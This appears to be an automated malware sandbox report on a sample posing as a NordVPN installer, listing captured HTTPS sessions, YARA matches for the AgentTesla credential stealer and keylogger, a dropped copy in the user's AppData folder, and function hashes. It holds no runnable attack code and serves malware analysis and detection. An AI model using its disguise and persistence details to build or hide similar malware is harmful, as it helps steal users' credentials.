Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	49911	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:12 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:12 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:12 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:12 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:12 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BcwKD-jWrEo9NWViNzBkMjBmZWFiM2U0NDQ1YmMzNzA5NjI2MTcy; Path=/; Secure Set-Cookie: crumb=BYcnDsI3Ldt4OTMxOTg3ZjcwNTE2MmEzM2M2NjBmNmFkNTJkYTdm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: SkjqMqW1/4TBTJ13y Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYcnDsI3Ldt4OTMxOTg3ZjcwNTE2MmEzM2M2NjBmNmFkNTJkYTdm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	49912	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:12 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:12 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:12 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:12 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:12 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bac0XoQRkBKoOTBiNWNjNDgzNzZkODBiNGExYjcxZjNhZWI1ZDhi; Path=/; Secure Set-Cookie: crumb=BZRrAhPXN1FJZGYyZDgzMGMwNzhmZTZkMmZhNDY1YjY3NzYyNzRh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: DstgmRKr/EFTqmNHD Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZRrAhPXN1FJZGYyZDgzMGMwNzhmZTZkMmZhNDY1YjY3NzYyNzRh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	49913	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:12 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:13 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:13 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:13 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:13 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:13 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BTpiE7ymQbJKYzlmMGQ0OTFkODQ5OTg1NDYzNDljOWNlZTg1YWFk; Path=/; Secure Set-Cookie: crumb=BSqfDgSNdxzoNDZmZmM4YTc0NmM2OGE5OGEzNGM4NDk1ZWI0MDY2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 9KFGCzMq/DX53lbD7 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BSqfDgSNdxzoNDZmZmM4YTc0NmM2OGE5OGEzNGM4NDk1ZWI0MDY2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	49914	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:13 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:13 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:13 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:13 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:13 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:13 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BWY3N01StUVAZGZiYWZiYTFkZmRiNjQxOWZmOTUwZTAxMWIwOGEy; Path=/; Secure Set-Cookie: crumb=Bb7LjG8BN44PMTQyNGIzYmFkYmRlNmI5MWZhNzkzZDFjMGU2Y2Vk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: xpzEtdYr/qs6plqpK Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bb7LjG8BN44PMTQyNGIzYmFkYmRlNmI5MWZhNzkzZDFjMGU2Y2Vk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	49915	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:13 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:57:14 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:14 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:14 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 52 44 77 70 58 79 53 6a 4b 32 52 30 6d 54 37 50 52 75 6d 62 37 4a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjRDwpXySjK2R0mT7PRumb7JIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:57:14 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:14 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bfr6-XSMFh9_MTRjNGZhNTAwZGNiM2UyMzA4NTE2OTAyMDUyYjM1; Path=/; Secure Set-Cookie: crumb=BSfDbhrvQw6WZDgxMWJjZmI3NzBkNWJjY2U2YzRjZTE1NzllYzI2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: BsIVfjXK/OMpIX1Cp Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BSfDbhrvQw6WZDgxMWJjZmI3NzBkNWJjY2U2YzRjZTE1NzllYzI2"}

Target ID:	0
Start time:	15:54:53
Start date:	01/09/2024
Path:	C:\Users\user\Desktop\NordVPNInstaller.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\NordVPNInstaller.exe"
Imagebase:	0x930000
File size:	301'120 bytes
MD5 hash:	59ACD8C97C40ED66CF5FCD0E0C010C6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2765864520.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1663885964.0000000000932000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.1663885964.0000000000932000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:55:21
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Roaming\bbb\bbb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\bbb\bbb.exe"
Imagebase:	0x560000
File size:	301'120 bytes
MD5 hash:	59ACD8C97C40ED66CF5FCD0E0C010C6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3078215363.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: Joe Security Rule: AgentTesla_1, Description: AgentTesla Payload, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: kevoreilly Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Roaming\bbb\bbb.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	15:55:30
Start date:	01/09/2024
Path:	C:\Users\user\AppData\Roaming\bbb\bbb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\bbb\bbb.exe"
Imagebase:	0xc10000
File size:	301'120 bytes
MD5 hash:	59ACD8C97C40ED66CF5FCD0E0C010C6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:56:22
Start date:	01/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
Wow64 process (32bit):	true
Commandline:	dw20.exe -x -s 12572
Imagebase:	0x10000000
File size:	36'264 bytes
MD5 hash:	89106D4D0BA99F770EAFE946EA81BB65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:56:42
Start date:	01/09/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 12576
Imagebase:	0x5f0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.2%
Dynamic/Decrypted Code Coverage:	85%
Signature Coverage:	9%
Total number of Nodes:	167
Total number of Limit Nodes:	10

Executed Functions

Function 053D3E4F Relevance: 20.7, APIs: 3, Strings: 4, Instructions: 8464COMMON

Download Yara Rule

Strings

:@k, xrefs: 053DC6BA
:@k, xrefs: 053DCA40
:@k, xrefs: 053DC963
:@k, xrefs: 053DC645

Memory Dump Source

Source File: 00000000.00000002.2777847656.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID: :@k$:@k$:@k$:@k
API String ID: 0-2500404787
Opcode ID: b3c47507185d195286c4b7a4189f1b3a3440e855315536e4f4590582090b4732
Instruction ID: b1b314a39b72820617c031ae70da44a6153cac71ca330b088b269404bfc36a0d
Opcode Fuzzy Hash: b3c47507185d195286c4b7a4189f1b3a3440e855315536e4f4590582090b4732
Instruction Fuzzy Hash: 54F36B35B042148FDB68DF34D9647AEB7F2AF88204F1080A9D50AA7794DF39AD85CF61

Function 053D2C7C Relevance: 12.3, Strings: 9, Instructions: 1073
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@k, xrefs: 053D305D
:@k, xrefs: 053D33CD
:@k, xrefs: 053D335B
:@k, xrefs: 053D3B39
:@k, xrefs: 053D37EE
:@k, xrefs: 053D3A57
:@k, xrefs: 053D2F78
:@k, xrefs: 053D30E1
:@k, xrefs: 053D3730

Memory Dump Source

Source File: 00000000.00000002.2777847656.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID: :@k$:@k$:@k$:@k$:@k$:@k$:@k$:@k$:@k
API String ID: 0-3873948674
Opcode ID: 2a30d688440ccad33bab2029bf22f1efe7b82c1eccad895ee94b539dfb2dd13a
Instruction ID: 7a915f7c842c0a1b27543456a916848c52aba3065aee4eab323dd17041920b10
Opcode Fuzzy Hash: 2a30d688440ccad33bab2029bf22f1efe7b82c1eccad895ee94b539dfb2dd13a
Instruction Fuzzy Hash: E68294307101156FDB08BBB4D4257AE77EBABE8308F22842A911687B98CF75CC5797B1

Function 06695550 Relevance: 10.0, Strings: 6, Instructions: 2522COMMON

Download Yara Rule

Strings

:@k, xrefs: 066966E3
d, xrefs: 06696018
f`k, xrefs: 066956E2
d, xrefs: 06696032
:@k, xrefs: 0669591C
:@k, xrefs: 06695937

Memory Dump Source

Source File: 00000000.00000002.2780316544.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID: :@k$:@k$:@k$d$d$f`k
API String ID: 0-793636353
Opcode ID: de496ffb72bac7d3ac15ccb1ad93254d4498f84fd7da3d0b565cb511a3ffaa76
Instruction ID: c14f58697aea72ffc97786c26a811fd6baae0febf62c80a74e23bbe025c82cd8
Opcode Fuzzy Hash: de496ffb72bac7d3ac15ccb1ad93254d4498f84fd7da3d0b565cb511a3ffaa76
Instruction Fuzzy Hash: 64330771E00A299FDF65CF68CC44A9AB7F2BF89304F0584E5D908AB221D771AE85CF51

Function 0669D300 Relevance: 4.9, Strings: 3, Instructions: 1157COMMON

Download Yara Rule

Strings

:@k, xrefs: 0669D3D3
:@k, xrefs: 0669D3E2
:@k, xrefs: 0669D55D

Memory Dump Source

Source File: 00000000.00000002.2780316544.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6690000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID: :@k$:@k$:@k
API String ID: 0-106351174
Opcode ID: 58e90c145332938c607959af0a8d07de831288d3a6a520fcc4dbbea20539bf2b
Instruction ID: 73de725bc9ce9d836015984dd7cc33ec4fabc46f0eaf00421030b0d4d20bc040
Opcode Fuzzy Hash: 58e90c145332938c607959af0a8d07de831288d3a6a520fcc4dbbea20539bf2b
Instruction Fuzzy Hash: 24A22670F002188BDB64DB79D8547AEB7F6AF84304F1484B9D80AAB791DB35AD81CF61

Function 053D0F78 Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 919COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 053D117C

Strings

:@k, xrefs: 053D1B30

Memory Dump Source

Source File: 00000000.00000002.2777847656.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_NordVPNInstaller.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID: :@k
API String ID: 6842923-2277858631
Opcode ID: f613357d0693b359d6ee0ae93dc4265b6980a92d666a31384b5c019b4cf4ea84
Instruction ID: e2ea50f11caf12e0ae3fda329cd6e0a19525ba964acb4d44460f01ca10af1795
Opcode Fuzzy Hash: f613357d0693b359d6ee0ae93dc4265b6980a92d666a31384b5c019b4cf4ea84
Instruction Fuzzy Hash: ED623631B002048BDB18AB74E5187AEB7F3AF85308F048469D406DB796DF79DD4AC7A2

Function 067F4120 Relevance: 4.3, Strings: 3, Instructions: 521
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@k, xrefs: 067F44CC
:@k, xrefs: 067F4541
:@k, xrefs: 067F479A

Memory Dump Source

Source File: 00000000.00000002.2780424103.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_67f0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID: :@k$:@k$:@k
API String ID: 0-106351174
Opcode ID: b0cc0115ad99848e363027cb20d690bf688fbe13671254eb2fd80795121dee8a
Instruction ID: 304d666715a4b5ae31c748c20d84ce6de6a5dcfe6be354030eb15eba81bfe339
Opcode Fuzzy Hash: b0cc0115ad99848e363027cb20d690bf688fbe13671254eb2fd80795121dee8a
Instruction Fuzzy Hash: 7D02A230B001159FDB08AFB4C824BAE77E7BFD8308F118429D5059BB99DF359C5A9BA1

Function 053D0F68 Relevance: 2.2, APIs: 1, Instructions: 711COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2777847656.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_NordVPNInstaller.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57383a1f6cb07a77f757453dd92f69c385c1440d45d5fdbf62514eecf029ab9
Instruction ID: 78ee20f62ff0070697e8735833071dd8ce58497c5749b70a12b423aa81bdee2b
Opcode Fuzzy Hash: e57383a1f6cb07a77f757453dd92f69c385c1440d45d5fdbf62514eecf029ab9
Instruction Fuzzy Hash: 5C422731B002008BDB28AB74E5687AEB3E7AF85348F044469D8069F7D6DF79DD46C792

Function 053D1D68 Relevance: 1.6, APIs: 1, Instructions: 123
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 053D1E71

Memory Dump Source

Source File: 00000000.00000002.2777847656.00000000053D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53d0000_NordVPNInstaller.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d843ece48f637810716174b8103dd7142e4bdca313c1f26bf9a7e73d105a46e3
Instruction ID: cdae5686465d4b762c6acb3ef7290be9d864c695b82cebd159afef6864bfcefb
Opcode Fuzzy Hash: d843ece48f637810716174b8103dd7142e4bdca313c1f26bf9a7e73d105a46e3
Instruction Fuzzy Hash: 6C418E71B053009FC768AF70E59566EB7B7FB85304B20862ED5528BB58D772E841CBA0

Function 05DE2417 Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05DE2497

Memory Dump Source

Source File: 00000000.00000002.2779550489.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5de0000_NordVPNInstaller.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 25c0e2947d198519f741c9c1fa543d203a7e0a68b3a1df6dff02cd87e2ec9da6
Instruction ID: f6357ae0a31919490d986c33f0ff4b2122d0fb383ca3a3342b783074c0730e80
Opcode Fuzzy Hash: 25c0e2947d198519f741c9c1fa543d203a7e0a68b3a1df6dff02cd87e2ec9da6
Instruction Fuzzy Hash: 6321D1765093809FDB128F25DC44B62BFF8FF16310F0884DAE9858B563D274D908CB62

Function 05DE2D57 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 05DE2DCD

Memory Dump Source

